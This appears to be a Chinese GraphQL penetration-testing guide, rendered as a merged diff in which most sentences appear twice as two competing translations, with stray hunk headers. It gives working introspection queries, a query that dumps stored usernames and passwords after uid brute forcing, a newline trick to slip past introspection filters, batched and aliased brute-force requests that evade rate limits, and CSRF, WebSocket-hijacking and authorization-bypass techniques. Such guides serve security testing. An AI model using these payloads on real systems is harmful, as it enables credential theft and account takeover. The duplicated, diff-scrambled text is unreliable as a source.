识别开放的 GraphQL 实例可以检查支持的查询。这对于理解通过端点访问的数据至关重要。GraphQL 的自省系统通过详细说明模式支持的查询来促进这一点。有关更多信息,请参阅 GraphQL 关于自省的文档:[**GraphQLAPI 的查询语言。**](https://graphql.org/learn/introspection/)
### 指纹
### 指纹识别
工具[**graphw00f**](https://github.com/dolevf/graphw00f)能够检测服务器中使用的GraphQL引擎然后为安全审计人员提供一些有用信息。
工具 [**graphw00f**](https://github.com/dolevf/graphw00f) 能够检测服务器使用的 GraphQL 引擎,并打印一些对安全审计员有用的信息。
#### 通用查询 <a href="#universal-queries" id="universal-queries"></a>
要检查URL是否是GraphQL服务可以发送一个**通用查询** `query{__typename}`。如果响应包含 `{"data": {"__typename": "Query"}}`则确认该URL托管了一个GraphQL端点。此方法依赖于GraphQL的`__typename`字段,该字段显示了查询对象的类型。
要检查 URL 是否为 GraphQL 服务,可以发送一个**通用查询**`query{__typename}`。如果响应包含 `{"data": {"__typename": "Query"}}`,则确认该 URL 托管了一个 GraphQL 端点。此方法依赖于 GraphQL 的 `__typename` 字段,该字段揭示了被查询对象的类型。
```javascript
query{__typename}
```
### 基本枚举
GraphQL通常支持**GET****POST**x-www-form-urlencoded和**POST**json。尽管出于安全考虑建议仅允许json以防止CSRF攻击。
Graphql 通常支持 **GET**、**POST** (x-www-form-urlencoded) 和 **POST**(json)。虽然出于安全考虑,建议仅允许 json 以防止 CSRF 攻击。
#### 自省
#### 反向查询
要使用自省来发现模式信息,请查询`__schema`字段。此字段在所有查询的根类型上都可用。
要使用反向查询发现架构信息,请查询 `__schema` 字段。该字段在所有查询的根类型上可用。
```bash
query={__schema{types{name,fields{name}}}}
```
使用此查询,您将找到正在使用的所有类型的名称:
通过此查询,您将找到所有正在使用的类型的名称:
![](<../../.gitbook/assets/image (1036).png>)
@ -67,22 +68,24 @@ query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofTy
```
{% endcode %}
使用此查询,您可以提取所有类型、字段和参数(以及参数的类型)。这将非常有用,以了解如何查询数据库。
通过这个查询,您可以提取所有类型、它的字段和它的参数(以及参数的类型)。这将非常有助于了解如何查询数据库。
![](<../../.gitbook/assets/image (950).png>)
**错误**
了解**错误**是否会**显示**是很有趣的,因为它们将提供有用的**信息**
了解**错误**是否会**显示**是很有趣的,因为它们将提供有用的**信息**
```
?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}
```
**通过内省枚举数据库架构**
![](<../../.gitbook/assets/image (416).png>)
**通过自省枚举数据库模式**
{% hint style="info" %}
如果启用了内省但上述查询无法运行,请尝试从查询结构中删除`onOperation`、`onFragment`和`onField`指令。
如果自省已启用但上述查询无法运行,请尝试从查询结构中删除 `onOperation`、`onFragment` `onField` 指令。
{% endhint %}
```bash
#Full introspection query
@ -173,72 +176,72 @@ name
}
}
```
内联反射查询:
内联自省查询:
```
/?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}
```
最后一行代码是一个GraphQL查询将从GraphQL中转储所有元信息(对象名称、参数、类型...
最后一行代码是一个graphql查询它将转储所有来自graphql的元信息(对象名称、参数、类型...
![](<../../.gitbook/assets/image (363).png>)
如果启用了内省,您可以使用[**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager)在GUI中查看所有选项。
如果启用了自省,您可以使用 [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) 在图形用户界面中查看所有选项。
### 查询
现在我们知道数据库中保存了哪种类型的信息,让我们尝试**提取一些值**。
现在我们知道数据库中保存了哪种信息,让我们尝试**提取一些值**。
内省中,您可以找到可以直接查询的**对象类型**(因为您不能仅仅因为对象存在就查询对象)。在下面的图片中,您可以看到"_queryType_"被称为"_Query_",而"_Query_"对象的一个字段是"_flags_"它也是一个对象类型。因此您可以查询flag对象。
自省中,您可以找到**可以直接查询的对象**因为您不能仅仅因为对象存在就查询它。在下图中您可以看到“_queryType_”被称为“_Query_”而“_Query_”对象的一个字段是“_flags_”这也是一种对象类型。因此您可以查询标志对象。
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
请注意,查询"_flags_"的类型是"_Flags_",并且该对象定义如下:
请注意,查询“_flags_”的类型是“_Flags_”该对象定义如下:
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57 (1).png>)
您可以看到"_Flags_"对象由**name**和**value**组成,然后您可以使用以下查询获取所有标志的名称和值:
您可以看到“_Flags_”对象由**name**和**value**组成。然后,您可以使用查询获取所有标志的名称和值:
```javascript
query={flags{name, value}}
```
请注意,如果要查询的对象是像以下示例中的字符串这样的**基本类型**
注意,如果**查询的对象**是像**字符串**这样的**原始****类型**,如以下示例所示
![](<../../.gitbook/assets/image (958).png>)
您可以直接查询
您可以直接查询:
```javascript
query={hiddenFlags}
```
在另一个示例中,"_Query_" 类型对象内有 2 个对象:"_user_" 和 "_users_"。\
如果这些对象不需要任何参数来搜索,只需**请求**所需的数据,就可以**检索所有信息**。在这个示例中,你可以提取已保存的用户名和密码:
在另一个例子中,"_Query_" 类型对象中有两个对象:"_user_" 和 "_users_"。\
如果这些对象不需要任何参数进行搜索,可以通过**请求**所需的数据来**检索所有信息**。在这个互联网示例中,你可以提取保存的用户名和密码:
![](<../../.gitbook/assets/image (880).png>)
然而,在这个示例中,如果你尝试这样做,你会收到这个**错误**
然而,在这个例子中,如果你尝试这样做,你会得到这个**错误**
![](<../../.gitbook/assets/image (1042).png>)
看起来它会使用类型为 _**Int**_ 的 "_**uid**_" 参数进行搜索。\
无论如何,我们已经知道,在[基本枚举](graphql.md#basic-enumeration)部分提出了一个查询,显示了我们所需的所有信息:`query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
无论如何,我们已经知道,在 [Basic Enumeration](graphql.md#basic-enumeration) 部分提出了一个查询,显示了所有所需的信息:`query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
如果你阅读提供的图像,当我运行该查询时,你会看到 "_**user**_" 有类型为 _Int_**arg** "_**uid**_"。
如果你阅读我运行该查询时提供的图像,你会看到 "_**user**_" 有一个类型为 _Int_**arg** "_**uid**_"。
因此,通过进行一些轻量级的 _**uid**_ 暴力破解,我发现 _**uid**=**1**_ 时检索到了一个用户名和一个密码:\
因此,通过一些轻量级的 _**uid**_ 暴力破解,我发现 _**uid**=**1**_ 时检索到了一个用户名和一个密码:\
`query={user(uid:1){user,password}}`
![](<../../.gitbook/assets/image (90).png>)
注意我**发现**我可以请求参数 "_**user**_" 和 "_**password**_",因为如果我尝试查找不存在的内容 (`query={user(uid:1){noExists}}`),我会到这个错误:
注意我**发现**我可以请求 **参数** "_**user**_" 和 "_**password**_",因为如果我尝试查找不存在的内容 (`query={user(uid:1){noExists}}`),我会到这个错误:
![](<../../.gitbook/assets/image (707).png>)
在**枚举阶段**期间,我发现 "_**dbuser**_" 对象的字段为 "_**user**_" 和 "_**password**_
在**枚举阶段**,我发现 "_**dbuser**_" 对象的字段有 "_**user**_" 和 "_**password**_"
**查询字符串转储技巧(感谢 @BinaryShadow\_**
如果你可以按字符串类型搜索,比如:`query={theusers(description: ""){username,password}}`,并且你**搜索空字符串**,它将**转储所有数据**。(_请注意此示例与教程示例无关对于此示例假设你可以使用 "**theusers**" 搜索名为 "**description**" 的字符串字段_).
如果你可以通过字符串类型进行搜索,例如:`query={theusers(description: ""){username,password}}`,并且你**搜索一个空字符串**,它将**转储所有数据**。 (_注意这个例子与教程的例子无关对于这个例子假设你可以通过一个名为 "**description**" 的字符串字段使用 "**theusers**" 进行搜索_).
### 搜索
在这个设置中,一个**数据库**包含**人员**和**电影**。**人员**通过他们的**电子邮件**和**姓名**进行识;**电影**通过它们的**名称**和**评分**进行识。**人员**可以互相成为朋友,也可以拥有电影,表示数据库的关系。
在这个设置中,一个**数据库**包含**人员**和**电影**。**人员**通过他们的**电子邮件**和**姓名**进行识**电影**通过它们的**名称**和**评分**进行识。**人员**可以互为朋友,也可以拥有电影,表示数据库的关系。
你可以通过**姓名**搜索人员并获取他们的电子邮件:
```javascript
@ -248,7 +251,7 @@ email
}
}
```
您可以通过姓名搜索人员并获取他们订阅的电影
您可以通过**名称**搜索人员并获取他们的**订阅****电影**
```javascript
{
searchPerson(name: "John Doe") {
@ -263,9 +266,9 @@ name
}
}
```
注意如何指示检索人的`subscribedMovies`的`name`。
注意如何指示检索人的 `subscribedMovies` `name`
您还可以**同时搜索多个对象**。在这种情况下搜索了2部电影
您还可以**同时搜索多个对象**。在这种情况下,搜索了 2 部电影:
```javascript
{
searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
@ -273,7 +276,7 @@ name
}
}r
```
甚至**使用别名关联多个不同对象的关系**
或者甚至**使用别名的多个不同对象的关系**
```javascript
{
johnsMovieList: searchPerson(name: "John Doe") {
@ -298,17 +301,15 @@ name
```
### Mutations
**变**
**变更用于在服务器端进行更改。**
**变异用于在服务器端进行更改。**
在**内省**中,您可以找到**声明的变异**。在下图中,"_MutationType_" 被称为 "_Mutation_",而 "_Mutation_" 对象包含变异的名称(在本例中为 "_addPerson_"
在**自省**中,您可以找到**声明的** **变更**。在下图中,"_MutationType_" 被称为 "_Mutation_",而 "_Mutation_" 对象包含变更的名称(在本例中为 "_addPerson_"
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27 (1).png>)
这个设置中,一个**数据库**包含**人员**和**电影**。**人员**通过他们的**电子邮件**和**姓名**进行标识;**电影**通过它们的**名称**和**评分**进行标识。**人员**可以互相成为朋友,也可以拥有电影,表示数据库内的关系。
此设置中,**数据库**包含**人员**和**电影**。**人员**通过其**电子邮件**和**姓名**进行识别;**电影**通过其**名称**和**评分**进行识别。**人员**可以彼此成为朋友,并且也可以拥有电影,表示数据库中的关系。
在数据库中**创建新的**电影的变异可以如下(在本例中,变异被称为 `addMovie`:
一个**在数据库中创建新**电影的变更可以像以下示例(在此示例中,变更被称为 `addMovie`
```javascript
mutation {
addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
@ -319,9 +320,9 @@ rating
}
}
```
**注意查询中指示了数据的值和类型。**
**注意查询中如何指示值和数据类型。**
此外,数据库支持一个名为 `addPerson`**mutation** 操作,允许创建**人员**以及将它们与现有的**朋友**和**电影**关联起来。 需要注意的是,朋友和电影必须在将它们链接到新创建的人员之前在数据库中存在
此外,数据库支持一个**mutation**操作,名为`addPerson`,允许创建**persons**及其与现有**friends**和**movies**的关联。重要的是要注意,朋友和电影必须在数据库中预先存在,然后才能将它们链接到新创建的人
```javascript
mutation {
addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
@ -349,34 +350,34 @@ releaseYear
}
}
```
### 指令
### 指令
如[**报告中描述的一个漏洞**](https://www.landh.tech/blog/20240304-google-hack-50000/)所述,指令过载意味着调用一个指令甚至数百万次,使服务器浪费操作,直到可能对其进行 DoS 攻击
如[**报告中描述的漏洞之一**](https://www.landh.tech/blog/20240304-google-hack-50000/)所述,指令重载意味着调用指令甚至数百万次以使服务器浪费操作直到可能导致拒绝服务DoS
### 在1个 API 请求中批量暴力破解
### 在1个API请求中批量暴力破解
这些信息来自[https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/)。\
通过 GraphQL API 进行身份验证,**同时发送许多带有不同凭据的查询**来检查。这是一种经典的暴力破解攻击,但现在由于 GraphQL 的批处理功能,可以在一个 HTTP 请求中发送多个登录/密码对。这种方法会欺骗外部速率监控应用程序,让其认为一切正常,没有暴力破解机器人试图猜测密码。
信息来自[https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/)。\
通过GraphQL API进行身份验证**同时发送多个不同凭据的查询**进行检查。这是一种经典的暴力破解攻击但现在由于GraphQL批量处理功能可以在每个HTTP请求中发送多个登录/密码对。这种方法会欺骗外部速率监控应用程序,使其认为一切正常,没有暴力破解机器人试图猜测密码。
下面是一个应用程序身份验证请求的最简单演示,**每次同时发送 3 对不同的电子邮件/密码**。显然,可以以相同的方式在单个请求中发送数千个:
下面是一个应用程序身份验证请求的最简单演示,**一次有3个不同的电子邮件/密码对**。显然,可以以相同的方式在单个请求中发送数千个:
![](<../../.gitbook/assets/image (1081).png>)
从响应截图中可以看到,第一个和第三个请求返回了 _null_ 并在 _error_ 部分反映了相应的信息。**第二个变异具有正确的身份验证**数据,响应具有正确的身份验证会话令牌。
从响应截图中可以看到,第一个和第三个请求返回了_null_并在_error_部分反映了相应的信息。**第二个变更具有正确的身份验证**数据,响应中包含正确的身份验证会话令牌。
![](<../../.gitbook/assets/image (119) (1).png>)
## 无需内省的 GraphQL
## 无需自省的GraphQL
越来越多的 **GraphQL 端点禁用内省**。然而当收到意外请求时GraphQL 抛出的错误足以让像 [**clairvoyance**](https://github.com/nikitastupin/clairvoyance) 这样的工具重新创建大部分模式
越来越多的**graphql端点正在禁用自省**。然而当收到意外请求时graphql抛出的错误足以让像[**clairvoyance**](https://github.com/nikitastupin/clairvoyance)这样的工具重建大部分架构
此外Burp Suite 扩展程序 [**GraphQuail**](https://github.com/forcesunseen/graphquail) 扩展程序 **观察通过 Burp 传递的 GraphQL API 请求**,并 **构建** 一个内部 GraphQL **模式**,每次看到新查询时都会构建。它还可以为 GraphiQL 和 Voyager 暴露模式。当接收到内省查询时该扩展程序返回一个虚假响应。因此GraphQuail 显示了 API 中可用于使用的所有查询、参数和字段。有关更多信息,请查看 [**此处**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema)。
此外Burp Suite扩展[**GraphQuail**](https://github.com/forcesunseen/graphquail) **观察通过Burp的GraphQL API请求**并**构建**一个内部GraphQL **架构**每当它看到新的查询时。它还可以为GraphiQL和Voyager公开架构。当收到自省查询时该扩展返回一个假响应。因此GraphQuail显示了API中可用的所有查询、参数和字段。有关更多信息,请[**查看此处**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema)。
一个不错的 **单词列表**,用于发现 [**GraphQL 实体可以在这里找到**](https://github.com/Escape-Technologies/graphql-wordlist?)。
一个很好的**词表**可以在这里发现[**GraphQL实体**](https://github.com/Escape-Technologies/graphql-wordlist?)。
### 绕过 GraphQL 内省防御 <a href="#bypassing-graphql-introspection-defences" id="bypassing-graphql-introspection-defences"></a>
### 绕过GraphQL自省防御 <a href="#bypassing-graphql-introspection-defences" id="bypassing-graphql-introspection-defences"></a>
为了绕过 API 中内省查询的限制,在 `__schema` 关键字后插入一个 **特殊字符** 是有效的。这种方法利用了常见的开发人员在正则表达式模式中的疏忽,这些模式旨在通过关注 `__schema` 关键字来阻止内省。通过添加像 **空格、换行符和逗号** 这样的字符GraphQL 会忽略但正则表达式可能没有考虑到的字符,可以绕过限制。例如,一个在 `__schema` 后面加上换行符的内省查询可能会绕过这种防御:
为了绕过API中对自省查询的限制在`__schema`关键字后插入**特殊字符**被证明是有效的。这种方法利用了开发人员在正则表达式模式中常见的疏忽,这些模式旨在通过关注`__schema`关键字来阻止自省。通过添加像**空格、换行符和逗号**这样的字符GraphQL会忽略这些字符但正则表达式可能没有考虑到从而可以绕过限制。例如在`__schema`后面带有换行符的自省查询可能会绕过这样的防御:
```bash
# Example with newline to bypass
{
@ -384,11 +385,11 @@ releaseYear
{queryType{name}}}"
}
```
如果不成功,考虑尝试替代的请求方法,比如**GET请求**或**使用`x-www-form-urlencoded`的POST**因为限制可能仅适用于POST请求。
如果不成功,请考虑其他请求方法,例如 **GET 请求****使用 `x-www-form-urlencoded` 的 POST 请求**,因为限制可能仅适用于 POST 请求。
### 尝试使用WebSockets
### 尝试 WebSockets
[**此演讲**](https://www.youtube.com/watch?v=tIo\_t5uUK50)中提到的检查是否可能通过WebSockets连接到GraphQL因为这可能允许您绕过潜在的WAF并使websocket通信泄漏GraphQL的模式
[**此演讲**](https://www.youtube.com/watch?v=tIo\_t5uUK50) 中提到的,检查是否可以通过 WebSockets 连接到 graphQL因为这可能允许您绕过潜在的 WAF并使 websocket 通信泄露 graphQL 的架构
```javascript
ws = new WebSocket('wss://target/graphql', 'graphql-ws');
ws.onopen = function start(event) {
@ -414,23 +415,23 @@ ws.send(JSON.stringify(graphqlMsg));
```
### **发现暴露的 GraphQL 结构**
当禁用内省时,检查网站源代码中 JavaScript 库中预加载的查询是一种有用的策略。可以使用开发者工具中的 `Sources` 选项卡找到这些查询,从而深入了解 API 的模式,并揭示潜在的**暴露敏感查询**。在开发者工具中搜索的命令为
introspection 被禁用时,检查网站源代码中 JavaScript 库中预加载的查询是一种有效的策略。这些查询可以通过开发者工具中的 `Sources` 选项卡找到,提供有关 API 架构的见解,并揭示潜在的 **暴露敏感查询**。在开发者工具中搜索的命令是
```javascript
Inspect/Sources/"Search all files"
file:* mutation
file:* query
```
## GraphQL中的CSRF
## CSRF in GraphQL
如果你不知道什么是CSRF请阅读以下页面
如果你不知道什么是 CSRF请阅读以下页面
{% content-ref url="../../pentesting-web/csrf-cross-site-request-forgery.md" %}
[csrf-cross-site-request-forgery.md](../../pentesting-web/csrf-cross-site-request-forgery.md)
{% endcontent-ref %}
这里你将能够找到一些GraphQL端点**配置而没有CSRF令牌。**
外面,你将能够找到几个 **未配置 CSRF 令牌的** GraphQL 端点。
请注意GraphQL请求通常通过使用Content-Type为**`application/json`**的POST请求发送。
请注意GraphQL 请求通常通过使用 Content-Type **`application/json`** 的 POST 请求发送。
```javascript
{"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}
```
@ -438,19 +439,19 @@ file:* query
```javascript
query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
```
因此,由于类似之前的CSRF请求是**没有预检请求**发送的因此可能利用CSRF在GraphQL中**执行** **更改**
因此,像之前那样的 CSRF 请求是 **在没有预检请求的情况下** 发送的,因此可以 **利用** **CSRF** 在 GraphQL 中 **进行** **更改**
但是请注意Chrome的`samesite`标志的新默认cookie值为`Lax`。这意味着cookie仅在第三方网站的GET请求中发送。
然而,请注意 Chrome 的 `samesite` 标志的新默认 cookie 值为 `Lax`。这意味着 cookie 仅会在 GET 请求中从第三方网站发送。
请注意,通常也可以将**查询请求**作为**GET** **请求发送而在GET请求中可能不会验证CSRF令牌。**
请注意,通常也可以将 **查询** **请求** 作为 **GET** **请求** 发送,并且 CSRF 令牌可能不会在 GET 请求中进行验证。
此外,滥用[**XS-Search**](../../pentesting-web/xs-search/) **攻击**可能会导致滥用用户凭据从GraphQL端点中窃取内容。
此外,利用 [**XS-Search**](../../pentesting-web/xs-search/) **攻击** 可能能够利用用户的凭据从 GraphQL 端点提取内容。
有关更多信息,请查看[**此处的原始帖子**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html)。
有关更多信息,请 **查看** [**原始帖子**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html)。
## GraphQL中的跨站点WebSocket劫持
## GraphQL 中的跨站 WebSocket 劫持
类似于滥用GraphQL的CRSF漏洞也可以执行**跨站点WebSocket劫持来滥用未受保护的cookie对GraphQL进行身份验证**并使用户在GraphQL中执行意外操作。
类似于利用 GraphQL 的 CRSF 漏洞,也可以执行 **跨站 WebSocket 劫持,以利用未保护的 cookie 进行 GraphQL 身份验证**,并使用户在 GraphQL 中执行意外操作。
有关更多信息,请查看:
@ -458,13 +459,13 @@ query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
[websocket-attacks.md](../../pentesting-web/websocket-attacks.md)
{% endcontent-ref %}
## GraphQL中的授权
## GraphQL 中的授权
在端点上定义的许多GraphQL函数可能仅检查请求者的身份验证而不检查授权。
在端点上定义的许多 GraphQL 函数可能仅检查请求者的身份验证而不检查授权。
修改查询输入变量可能导致泄露敏感帐户详细信息[leaked](https://hackerone.com/reports/792927)。
修改查询输入变量可能导致敏感账户详细信息 [泄露](https://hackerone.com/reports/792927)。
甚至可能导致账户接管尝试修改其他账户数据的变异
突变甚至可能导致账户接管,试图修改其他账户数据
```javascript
{
"operationName":"updateProfile",
@ -472,23 +473,23 @@ query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
}
```
### 绕过GraphQL授权
### 绕过 GraphQL 中的授权
[链接查询](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln) 可以绕过弱身份验证系统。
[将查询链接](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln)在一起可以绕过一个弱认证系统。
在下面的示例中您可以看到操作是“forgotPassword”它应该只执行与之关联的forgotPassword查询。这可以通过在末尾添加一个查询来绕过例如我们添加了“register”和一个用户变量系统将其注册为新用户。
在下面的示例中您可以看到操作是“forgotPassword”并且它应该只执行与之相关的 forgotPassword 查询。通过在末尾添加一个查询可以绕过这一点在这种情况下我们添加“register”和一个用户变量以便系统注册为新用户。
<figure><img src="../../.gitbook/assets/GraphQLAuthBypassMethod.PNG" alt=""><figcaption></figcaption></figure>
## 使用GraphQL中的别名绕过速率限制
## 使用 GraphQL 中的别名绕过速率限制
在GraphQL中别名是一个强大的功能允许在进行API请求时**明确命名属性**。这种能力特别适用于在单个请求中检索**同一类型的多个实例**。别名可用于克服阻止GraphQL对象具有相同名称的多个属性的限制。
GraphQL 中,别名是一个强大的功能,允许在进行 API 请求时**明确命名属性**。这个功能对于在单个请求中检索**同一类型的多个实例**特别有用。别名可以用来克服 GraphQL 对象不能具有多个同名属性的限制。
建议查看有关GraphQL别名的详细理解的资源[别名](https://portswigger.net/web-security/graphql/what-is-graphql#aliases)。
要详细了解 GraphQL 别名,推荐以下资源:[Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases)。
虽然别名的主要目的是减少大量API调用的必要性但已经发现了一个意外的用例即可以利用别名来对GraphQL端点执行暴力攻击。这是可能的因为一些端点受到速率限制器的保护这些速率限制器旨在通过限制**HTTP请求的数量**来阻止暴力攻击。然而这些速率限制器可能不考虑每个请求中的操作数量。鉴于别名允许在单个HTTP请求中包含多个查询它们可以规避此类速率限制措施。
虽然别名的主要目的是减少大量 API 调用的必要性,但已识别出一个意外的用例,其中别名可以被利用来对 GraphQL 端点执行暴力攻击。这是可能的,因为某些端点受到速率限制器的保护,旨在通过限制**HTTP 请求的数量**来阻止暴力攻击。然而,这些速率限制器可能没有考虑到每个请求中的操作数量。鉴于别名允许在单个 HTTP 请求中包含多个查询,它们可以绕过此类速率限制措施。
考虑下面提供的示例,说明了如何使用别名查询来验证商店折扣代码的有效性。这种方法可以绕过速率限制,因为它将多个查询编译到一个HTTP请求中从而可能允许同时验证多个折扣代码。
考虑下面提供的示例,说明了如何使用别名查询来验证商店折扣代码的有效性。这种方法可以绕过速率限制,因为它将多个查询编译成一个 HTTP 请求,可能允许同时验证多个折扣代码。
```bash
# Example of a request utilizing aliased queries to check for valid discount codes
query isValidDiscount($code: Int) {
@ -507,29 +508,29 @@ valid
### 漏洞扫描器
* [https://github.com/dolevf/graphql-cop](https://github.com/dolevf/graphql-cop): 测试 GraphQL 端点的常见配置错误
* [https://github.com/assetnote/batchql](https://github.com/assetnote/batchql): 重点关注执行批量 GraphQL 查询和变更的 GraphQL 安全审计脚本
* [https://github.com/dolevf/graphw00f](https://github.com/dolevf/graphw00f): 对正在使用的 GraphQL 进行指纹识别
* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): 工具包,可用于抓取模式并搜索敏感数据,测试授权,暴力破解模式,并找到到给定类型的路径
* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): 可作为独立工具或 [Burp 扩展](https://github.com/doyensec/inql) 使用。
* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): 也可用作 CLI 客户端以自动化攻击
* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): 列出在 GraphQL 模式中到达给定类型的不同方式的工具。
* [https://github.com/doyensec/GQLSpection](https://github.com/doyensec/GQLSpection): InQL 的独立和 CLI 模式的继者
* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): 用于高级 GraphQL 测试的 Burp 扩展。_**Scanner**_ 是 InQL v5.0 的核心,您可以分析 GraphQL 端点或本地内省模式文件。它会自动生成所有可能的查询和变更并将它们组织成结构化视图供您分析。_**Attacker**_ 组件可让您运行批量 GraphQL 攻击,可用于规避实施不当的速率限制
* [https://github.com/nikitastupin/clairvoyance](https://github.com/nikitastupin/clairvoyance): 尝试获取模式,即使禁用内省,也可通过一些 GraphQL 数据库的帮助来建议变更和参数的名称。
* [https://github.com/dolevf/graphql-cop](https://github.com/dolevf/graphql-cop): 测试graphql端点的常见错误配置
* [https://github.com/assetnote/batchql](https://github.com/assetnote/batchql): 专注于执行批量GraphQL查询和变更的GraphQL安全审计脚本。
* [https://github.com/dolevf/graphw00f](https://github.com/dolevf/graphw00f): 指纹识别正在使用的graphql
* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): 可用于抓取模式和搜索敏感数据、测试授权、暴力破解模式以及查找到给定类型的路径的工具包
* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): 可作为独立工具或[Burp扩展](https://github.com/doyensec/inql)使用。
* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): 也可以作为CLI客户端使用以自动化攻击
* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): 列出在GraphQL模式中**到达给定类型的不同方式**的工具。
* [https://github.com/doyensec/GQLSpection](https://github.com/doyensec/GQLSpection): InQL的独立和CLI模式的继
* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): 用于高级GraphQL测试的Burp扩展。_**扫描器**_是InQL v5.0的核心您可以分析GraphQL端点或本地自省模式文件。它自动生成所有可能的查询和变更并将其组织成结构化视图以供分析。_**攻击者**_组件允许您运行批量GraphQL攻击这对于规避实现不佳的速率限制非常有用
* [https://github.com/nikitastupin/clairvoyance](https://github.com/nikitastupin/clairvoyance): 尝试通过使用一些Graphql数据库的帮助即使在禁用自省的情况下也获取模式这些数据库将建议变更和参数的名称。
### 客户端
* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): GUI 客户端
* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): GUI 客户端
* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): GUI客户端
* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): GUI客户端
### 自动测试
### 自动测试
{% embed url="https://graphql-dashboard.herokuapp.com/" %}
* 解释 AutoGraphQL 的视频: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
* 解释AutoGraphQL的视频: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
## 参考资料
## 参考
* [**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/)
